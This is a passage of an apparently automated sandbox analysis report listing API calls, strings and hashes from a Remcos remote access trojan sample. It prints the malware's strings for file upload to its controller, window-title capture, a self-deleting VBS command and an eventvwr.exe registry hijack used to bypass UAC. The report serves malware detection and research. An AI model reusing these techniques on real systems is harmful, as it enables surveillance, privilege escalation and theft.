                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                • Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                • __aulldiv.LIBCMT ref: 00407D89
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                • CloseHandle.KERNEL32(00000000), ref: 00408038
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldiv
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                • API String ID: 1656873915-2596673759
                                • Opcode ID: 7a83b8813984d6dadb7c93ecd27c27c1dafacf90928f224cd7c357c47f9d93bc
                                • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                • Opcode Fuzzy Hash: 7a83b8813984d6dadb7c93ecd27c27c1dafacf90928f224cd7c357c47f9d93bc
                                • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                  • Part of subcall function 004120E8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                  • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                  • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                • ExitProcess.KERNEL32 ref: 0040C57D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$@8T$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                • API String ID: 1913171305-2459740809
                                • Opcode ID: 4e55e68949fade624ef00a0c12fdd6cedf52d5a2f7ca7175f4c8ba38e7bbf390
                                • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                • Opcode Fuzzy Hash: 4e55e68949fade624ef00a0c12fdd6cedf52d5a2f7ca7175f4c8ba38e7bbf390
                                • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                APIs
                                  • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                • __dosmaperr.LIBCMT ref: 00452ED6
                                • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                • __dosmaperr.LIBCMT ref: 00452EF5
                                • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                • GetLastError.KERNEL32 ref: 00453091
                                • __dosmaperr.LIBCMT ref: 00453098
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 00409C81
                                • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                • GetForegroundWindow.USER32 ref: 00409C92
                                • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(00000000,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: 6ed6bfc40f2a8fca4eab3e118565c47f9c2f2630868c3a4781848372da684854
                                • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                • Opcode Fuzzy Hash: 6ed6bfc40f2a8fca4eab3e118565c47f9c2f2630868c3a4781848372da684854
                                • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                                APIs
                                  • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                • CloseHandle.KERNEL32(00000000), ref: 00416123
                                • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWait
                                • String ID: <$@$@%G$@%G$P0F$Temp
                                • API String ID: 2516244461-846188940
                                • Opcode ID: 1868534d7fd73e41bc4db1415425d443a43517b2e09c20fc338ca5ac55ad3bcd
                                • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                • Opcode Fuzzy Hash: 1868534d7fd73e41bc4db1415425d443a43517b2e09c20fc338ca5ac55ad3bcd
                                • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                • __dosmaperr.LIBCMT ref: 00438646
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                • __dosmaperr.LIBCMT ref: 00438683
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                • __dosmaperr.LIBCMT ref: 004386D7
                                • _free.LIBCMT ref: 004386E3
                                • _free.LIBCMT ref: 004386EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: pF$tF
                                • API String ID: 269201875-2954683558
                                • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 0040549F
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                • TranslateMessage.USER32(?), ref: 0040555E
                                • DispatchMessageA.USER32(?), ref: 00405569
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslate
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2460878853-749203953
                                • Opcode ID: 4f4e66cd07cc992fc44a31c8fe1672d313a345983aa79b6bcdf89a6fe3b89e59
                                • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                • Opcode Fuzzy Hash: 4f4e66cd07cc992fc44a31c8fe1672d313a345983aa79b6bcdf89a6fe3b89e59
                                • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                • ExitProcess.KERNEL32 ref: 00406782
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteExitProcessShell
                                • String ID: @8T$C:\Users\user\Desktop\DB5rQYsfd6.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                • API String ID: 1124553745-3672440147
                                • Opcode ID: f708368e7f3f46e5b25359c10fa8ec572cdcbdb9988c5ff18000a1be1354ba9a
                                • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                • Opcode Fuzzy Hash: f708368e7f3f46e5b25359c10fa8ec572cdcbdb9988c5ff18000a1be1354ba9a
                                • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                APIs
                                • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                • GetConsoleWindow.KERNEL32 ref: 0041AA63
                                • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConsoleWindow$AllocShow
                                • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                • API String ID: 3461962499-4025029772
                                • Opcode ID: bb5842c9276b924b84f2b7f99c8538917f0848a2b2f901183b5b0da883229c56
                                • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                • Opcode Fuzzy Hash: bb5842c9276b924b84f2b7f99c8538917f0848a2b2f901183b5b0da883229c56
                                • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 01d7c80d3e8cbe2ee9ce9df63989760f3c3320e1a6c13e210a8b5135b2194479
                                • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                • Opcode Fuzzy Hash: 01d7c80d3e8cbe2ee9ce9df63989760f3c3320e1a6c13e210a8b5135b2194479
                                • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                APIs
                                • _free.LIBCMT ref: 00445645
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00445651
                                • _free.LIBCMT ref: 0044565C
                                • _free.LIBCMT ref: 00445667
                                • _free.LIBCMT ref: 00445672
                                • _free.LIBCMT ref: 0044567D
                                • _free.LIBCMT ref: 00445688
                                • _free.LIBCMT ref: 00445693
                                • _free.LIBCMT ref: 0044569E
                                • _free.LIBCMT ref: 004456AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                APIs
                                • __EH_prolog.LIBCMT ref: 00417F6F
                                • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                • Sleep.KERNEL32(000003E8), ref: 004180B3
                                • GetLocalTime.KERNEL32(?), ref: 004180BB
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                • API String ID: 489098229-3790400642
                                • Opcode ID: 06a38dffe589ece9c94c7312818e614725db3db3adc6128aa6907061a3018930
                                • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                • Opcode Fuzzy Hash: 06a38dffe589ece9c94c7312818e614725db3db3adc6128aa6907061a3018930
                                • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                APIs
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEventLocalTime
                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 2082726707-2151626615
                                • Opcode ID: f585475f6b8ab2e405adadd23c5203a1a4cbbe8530a351afb4dab49d1aabd258
                                • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
